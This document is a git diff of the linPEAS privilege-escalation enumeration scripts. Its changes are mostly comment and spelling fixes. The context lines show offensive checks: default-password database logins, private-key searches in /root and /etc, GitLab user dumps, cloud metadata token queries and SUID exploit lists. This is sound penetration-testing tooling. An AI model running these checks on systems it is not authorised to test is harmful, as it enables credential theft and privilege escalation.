diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index f3262a1ad..04170f112 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -6,12 +6,12 @@ import os import stat -#python3 -m builder.linpeas_builder +# python3 -m builder.linpeas_builder def main(): # Load configuration ploaded = PEASLoaded() - # Build temporary linpeas_base.sh file + # Build temporary linpeas_base.sh file lbasebuilder = LinpeasBaseBuilder() lbasebuilder.build() @@ -20,7 +20,7 @@ def main(): lbuilder.build() lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH) lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS") - os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file + os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base.sh file st = os.stat(FINAL_FAT_LINPEAS_PATH) os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC) @@ -30,4 +30,4 @@ def main(): if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh index 8f5b7dba3..429e25d78 100644 --- a/linPEAS/builder/linpeas_parts/2_container.sh +++ b/linPEAS/builder/linpeas_parts/2_container.sh @@ -16,7 +16,7 @@ containerCheck() { containerType="docker\n" fi - # Are we inside kubenetes? + # Are we inside kubernetes? if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || grep -qai kubepods /proc/self/cgroup 2>/dev/null; then @@ -257,7 +257,7 @@ else if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi -#If docker +# If docker if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup @@ -279,7 +279,7 @@ if echo "$containerType" | grep -qi "docker"; then fi fi -#If token secrets mounted +# If token secrets mounted if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then print_2title "Listing mounted tokens" print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod" diff --git a/linPEAS/builder/linpeas_parts/3_cloud.sh b/linPEAS/builder/linpeas_parts/3_cloud.sh index 413fa50aa..39f53e495 100644 --- a/linPEAS/builder/linpeas_parts/3_cloud.sh +++ b/linPEAS/builder/linpeas_parts/3_cloud.sh @@ -150,9 +150,9 @@ if [ "$is_gcp" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi - + # GCP Enumeration if [ "$gcp_req" ]; then - print_2title "Google CLoud Platform Enumeration" + print_2title "Google Cloud Platform Enumeration" print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security" ## GC Project Info @@ -236,7 +236,7 @@ if [ "$is_gcp" = "Yes" ]; then fi fi - +# AWS ECS Enumeration if [ "$is_aws_ecs" = "Yes" ]; then print_2title "AWS ECS Enumeration" @@ -270,6 +270,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then fi fi +# AWS EC2 Enumeration if [ "$is_aws_ec2" = "Yes" ]; then print_2title "AWS EC2 Enumeration" @@ -334,6 +335,7 @@ if [ "$is_aws_ec2" = "Yes" ]; then fi fi +# AWS Lambda Enumeration if [ "$is_aws_lambda" = "Yes" ]; then print_2title "AWS Lambda Enumeration" printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME @@ -346,6 +348,7 @@ if [ "$is_aws_lambda" = "Yes" ]; then printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi +# AWS Codebuild Enumeration if [ "$is_aws_codebuild" = "Yes" ]; then print_2title "AWS Codebuild Enumeration" @@ -371,6 +374,7 @@ if [ "$is_aws_codebuild" = "Yes" ]; then fi fi +# DO Droplet Enumeration if [ "$is_do" = "Yes" ]; then print_2title "DO Droplet Enumeration" @@ -398,11 +402,12 @@ if [ "$is_do" = "Yes" ]; then fi fi +# IBM Cloud Enumeration if [ "$is_ibm_vm" = "Yes" ]; then print_2title "IBM Cloud Enumeration" if ! [ "$IBM_TOKEN" ]; then - echo "Couldn't get the metdata token:(" + echo "Couldn't get the metadata token:(" else TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" @@ -436,12 +441,13 @@ if [ "$is_ibm_vm" = "Yes" ]; then fi +# Azure VM Enumeration if [ "$is_az_vm" = "Yes" ]; then print_2title "Azure VM Enumeration" HEADER="Metadata:true" URL="http://169.254.169.254/metadata" - API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions + API_VERSION="2021-12-13" # https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions az_req="" if [ "$(command -v curl)" ]; then diff --git a/linPEAS/builder/linpeas_parts/7_software_information.sh b/linPEAS/builder/linpeas_parts/7_software_information.sh index 40598a499..a016f01c0 100644 --- a/linPEAS/builder/linpeas_parts/7_software_information.sh +++ b/linPEAS/builder/linpeas_parts/7_software_information.sh @@ -45,7 +45,7 @@ if [ "$MACPEAS" ]; then done fi -#-- SI) Mysql version +#-- SI) MySQL version if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" @@ -56,7 +56,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" echo "" - #-- SI) Mysql connection root/root + #-- SI) MySQL connection root/root print_list "MySQL connection using default root/root ........... " mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) if [ "$mysqlconnect" ]; then @@ -65,7 +65,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/toor + #-- SI) MySQL connection root/toor print_list "MySQL connection using root/toor ................... " mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) if [ "$mysqlconnect" ]; then @@ -74,7 +74,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/NOPASS + #-- SI) MySQL connection root/NOPASS mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then @@ -85,7 +85,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" fi -#-- SI) Mysql credentials +#-- SI) MySQL credentials if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do @@ -144,7 +144,7 @@ peass{PostgreSQL} #-- SI) PostgreSQL brute if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. -#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this +# Checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no @@ -239,7 +239,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) # If there is tons of files linpeas gets frozen here without a timeout privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi else @@ -352,8 +352,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PST printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do if [ "$l" ] && echo "$l" | grep -q "@"; then printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + # kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + # We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done elif echo "$f" | grep -q krb5.conf; then @@ -533,7 +533,7 @@ fi ##-- SI) Gitlab if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then print_2title "Searching GitLab related files" - #Check gitlab-rails + # Check gitlab-rails if [ "$(command -v gitlab-rails)" ]; then echo "gitlab-rails was found. Trying to dump users..." gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," @@ -546,7 +546,7 @@ if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$ echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" echo "" fi - #Check gitlab files + # Check gitlab files printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if echo $f | grep -q secrets.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," diff --git a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh index 579d239c1..ae522863b 100644 --- a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh +++ b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh @@ -24,15 +24,15 @@ fi suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) for s in $suids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total"; then break; fi sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing + true # Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" @@ -55,12 +55,12 @@ for s in $suids_files; do $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do sline_first="$(echo "$sline" | cut -d ' ' -f1)" if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi fi @@ -105,7 +105,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sud sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) for s in $sgids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total";then break; fi sname="$(echo $s | awk '{print $9}')" @@ -113,7 +113,7 @@ for s in $sgids_files; do true #Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" @@ -136,12 +136,12 @@ for s in $sgids_files; do $STRINGS "$sname" | sort | uniq | while read sline; do sline_first="$(echo $sline | cut -d ' ' -f1)" if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + else # If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" fi fi @@ -456,7 +456,7 @@ fi if ! [ "$IAMROOT" ]; then print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + # In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$obmowbe" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; @@ -488,4 +488,4 @@ if ! [ "$IAMROOT" ]; then fi done echo "" -fi \ No newline at end of file +fi diff --git a/linPEAS/builder/linpeas_parts/9_interesting_files.sh b/linPEAS/builder/linpeas_parts/9_interesting_files.sh index a6e19f357..b7ed08ace 100644 --- a/linPEAS/builder/linpeas_parts/9_interesting_files.sh +++ b/linPEAS/builder/linpeas_parts/9_interesting_files.sh @@ -11,7 +11,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -O "$f" ]; then echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then # If write permision, win found (no check exploits) echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; @@ -80,14 +80,14 @@ find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/ echo "" ##-- IF) Writable log files -if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below print_2title "Writable log files (logrotten) (limit 50)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then # Only print info if something interesting found if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; @@ -164,7 +164,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then SQLITEPYTHON="" echo "" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then # If readable and filecmd and sqlite, or readable and not filecmd if [ "$(command -v sqlite3 2>/dev/null)" ]; then tables=$(sqlite3 $f ".tables" 2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" @@ -186,7 +186,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then else columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) fi - #Check found columns for interesting fields + # Check found columns for interesting fields INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") if [ "$INTCOLUMN" ]; then printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index f77efd857..c0f945a9f 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -51,7 +51,7 @@ ITALIC="${C}[3m" # --) SUPERFAST - FAST & do not search for special filaes in all the folders if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi -FAST="1" #By default stealth/fast mode +FAST="1" # By default stealth/fast mode SUPERFAST="" DISCOVERY="" PORTS="" @@ -68,9 +68,9 @@ EXTRA_CHECKS="" REGEXES="" PORT_FORWARD="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" -[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 -[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 -[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 +[ -z "$THREADS" ] && THREADS="2" # If THREADS is empty, put number 2 +[ -n "$THREADS" ] && THREADS="2" # If THREADS is null, put number 2 +[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" # It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${GREEN} Checks: @@ -124,7 +124,7 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do e) EXTRA_CHECKS="1";; r) REGEXES="1";; f) SEARCH_IN_FOLDER=$OPTARG; - if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" + if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then # Make sure firmware folder ends with "/" SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; fi; ROOT_FOLDER=$SEARCH_IN_FOLDER; @@ -319,7 +319,7 @@ mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut if ! [ "$mounted" ]; then mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') fi -if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty +if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi # Don't let any blacklist to be empty mountG="swap|/cdrom|/floppy|/dev/shm" notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee" mountpermsB="\Wsuid|\Wuser|\Wexec" @@ -329,7 +329,7 @@ rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmt groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)" groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" -knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html +knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' # https://www.togaware.com/linux/survivor/Standard_Groups.html mygroups=$(groups 2>/dev/null | tr " " "|") # Default Binaries List @@ -338,7 +338,7 @@ sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnomet sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" -#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION +# Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 @@ -392,7 +392,7 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" -#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' +# To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' sidVB='peass{SUIDVB1_HERE}' sidVB2='peass{SUIDVB2_HERE}' cfuncs='file|free|main|more|read|split|write' @@ -428,7 +428,7 @@ for P in $ADDPATH; do if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi done -# test if sed supports -E or -r +# Test if sed supports -E or -r E=E echo | sed -${E} 's/o/a/' 2>/dev/null if [ $? -ne 0 ] ; then @@ -459,13 +459,13 @@ if ! [ "$USER" ]; then USER=$(whoami 2>/dev/null || echo -n "UserUnknown") fi if [ ! "$HOME" ]; then - if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home + if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; # Mac home else HOME="/home/$USER"; fi fi Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') -#This variables are dived in several different ones because NetBSD required it +# These variables are divided into several different ones because NetBSD requires that. peass{VARIABLES} 